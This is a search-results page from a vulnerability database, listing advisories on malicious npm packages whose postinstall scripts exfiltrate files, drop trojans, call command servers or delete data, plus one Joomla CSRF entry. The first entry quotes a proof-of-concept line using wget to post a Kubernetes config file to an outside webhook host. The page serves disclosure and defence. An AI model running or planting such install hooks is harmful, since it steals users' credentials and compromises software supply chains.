Lucene search
K

1340 matches found

Snyk
Snyk
added 2021/03/04 5:52 p.m.3 views

Malicious Package

Overview radar-cms is a malicious package. The package was found to have a post-install command which when executed will exfiltrate multiple files from a host machine. PoC "postinstall": "wget --post-file /.kube/config https://entfet95itcxpuu.m.pipedream.net;wget --post-file package.json...

9.6CVSS6.9AI score
Exploits0References2
Node.js
Node.js
added 2020/11/30 6:20 p.m.31 views

Malicious Package

Overview The package jdb.js contained malicious code. The package ran a postinstall script and contained a dropper for the njRAT/Bladabindi Remote Access Trojan. Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys...

7AI score
Exploits0Affected Software1
Veracode
Veracode
added 2020/11/11 5:20 a.m.12 views

Malicious Package

discord.app is a malicious package. The package includes a postinstall script that executes a malicious .exe file containing Trojan malware...

2.2AI score
Exploits0
Veracode
Veracode
added 2020/11/11 5:4 a.m.11 views

Malicious Package

ac-addon is a malicious package. The package includes a postinstall script that executes two malicious .exe files containing Trojan malware...

2.2AI score
Exploits0
Veracode
Veracode
added 2020/11/11 4:12 a.m.10 views

Malicious Package

wsbd.js is a malicious package. The package executes a malicious postinstall script which runs an exe file containing Trojan malware upon installation...

2.1AI score
Exploits0
Node.js
Node.js
added 2020/11/10 9:23 p.m.43 views

Malicious Package

Overview The package wsbd.js contained malicious code. The package ran a postinstall script that executed an.exe file containing Trojan malware. Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that...

6.8AI score
Exploits0Affected Software1
Node.js
Node.js
added 2020/11/09 11:47 p.m.36 views

Malicious Package

Overview The package discord.dll contained malicious code. The package ran a postinstall script that exfiltrated local files such as browser local databases. The information was exfiltrated to a remote Discord webhook. Recommendation Remove the package from your system and rotate any credentials...

6.6AI score
Exploits0Affected Software1
OSV
OSV
added 2020/09/11 9:9 p.m.7 views

GHSA-8MM3-2MCJ-CX6R Malicious Package in angluar-cli

Version 0.0.3 of angluar-cli contains malicious code as a postinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed the package attempts to remove files and stop processes related to McAfee antivirus...

9.8CVSS7.2AI score
Exploits0References1
Github Security Blog
Github Security Blog
added 2020/09/11 9:8 p.m.38 views

Malicious Package in shrugging-logging

All versions of shrugging-logging contain malicious code as a postinstall script. The package fetches all names of npm packages owned by the user and attempts to add another maintainer to every package as a means of package hijacking, Recommendation Remove the package from your system. If you own...

0.9AI score
Exploits0References2Affected Software1
OSV
OSV
added 2020/09/03 9:7 p.m.10 views

GHSA-8HMR-W35F-3QGJ Malicious Package in harmlesspackage

Version 0.0.1 of harmlesspackage contains malicious code as a postinstall script. The package printed a message to the console and performed a GET request to a remote server. Recommendation Remove the package from your environment. There is no evidence of further compromise...

9.8CVSS7.4AI score
Exploits0References1
Github Security Blog
Github Security Blog
added 2020/09/03 9:7 p.m.15 views

Malicious Package in harmlesspackage

Version 0.0.1 of harmlesspackage contains malicious code as a postinstall script. The package printed a message to the console and performed a GET request to a remote server. Recommendation Remove the package from your environment. There is no evidence of further compromise...

3.2AI score
Exploits0References2Affected Software1
OSV
OSV
added 2020/09/03 6:22 p.m.7 views

GHSA-JF8X-WG7F-P3W8 Malicious Package in cage-js

All versions of cage-js contains malicious code. The malware downloads and runs a script from a remote server as a postinstall script. Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should...

9.8CVSS7.1AI score
Exploits0References1
Github Security Blog
Github Security Blog
added 2020/09/03 6:22 p.m.23 views

Malicious Package in cage-js

All versions of cage-js contains malicious code. The malware downloads and runs a script from a remote server as a postinstall script. Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should...

2.8AI score
Exploits0References2Affected Software1
OSV
OSV
added 2020/09/03 5:28 p.m.10 views

GHSA-G9WF-393Q-4W38 Malicious Package in only-test-not-install

All versions of only-test-not-install contain malicious code. The package deletes the folder /test from the system as a postinstall script. Recommendation Remove the package from your environment. There are no further signs of compromise...

9.8CVSS7.1AI score
Exploits0References1
Github Security Blog
Github Security Blog
added 2020/09/03 5:27 p.m.14 views

Malicious Package in my-very-own-package

All versions of my-very-own-package contain malicious code. The package sends the output of process.versions, process.arch and process.platform to a remote server in a postinstall script. Recommendation Remove the package from your environment. There are no further signs of compromise...

3.9AI score
Exploits0References2Affected Software1
Github Security Blog
Github Security Blog
added 2020/09/03 5:22 p.m.16 views

Malicious Package in maybemaliciouspackage

All versions of maybemaliciouspackage contain malicious code. The package prints the system's SSH keys to the console as a postinstall script. Recommendation Remove the package from your environment. There are no further signs of compromise...

3.4AI score
Exploits0References2Affected Software1
Github Security Blog
Github Security Blog
added 2020/09/02 9:47 p.m.26 views

Malicious Package in kraken-api

Version 0.1.8 of kraken-api contains malicious code as a postinstall script. When installed, the package calls home to a Command and Control server to execute arbitrary commands. Recommendation Any computer that has this package installed or running should be considered fully compromised. All...

7.6AI score
Exploits0References2Affected Software1
OSV
OSV
added 2020/09/02 9:27 p.m.9 views

GHSA-W3F3-4J22-2V3P Malicious Package in destroyer-of-worlds

The package destroyer-of-worlds contained malicious code. The package contained a bash script that was run as a postinstall script. The script deleted system files and attempted to exhaust resources by creating a large file, a fork bomb and an endless loop. The script targeted UNIX systems...

9.8CVSS7AI score
Exploits0References1
Positive Technologies
Positive Technologies
added 2020/06/02 12:0 a.m.5 views

PT-2020-13661 · Open Source Matters · Joomla!

Name of the Vulnerable Software and Affected Versions: Joomla! versions prior to 3.9.19 Description: The issue is related to missing token checks in the com postinstall component, which leads to Cross-Site Request Forgery CSRF. CSRF is an attack where an attacker tricks a user into performing...

8.8CVSS6.7AI score0.00677EPSS
Exploits0References6
Veracode
Veracode
added 2020/01/14 1:53 a.m.7 views

Malicious Package

1337qq-js is a vulnerable package. In the postinstall script, the package targets UNIX systems by reading system files, environment variables and npmrc file, and exfiltrates the information to an external server at 119.28.41.206 on port 9999...

2.3AI score
Exploits0
Rows per page
Query Builder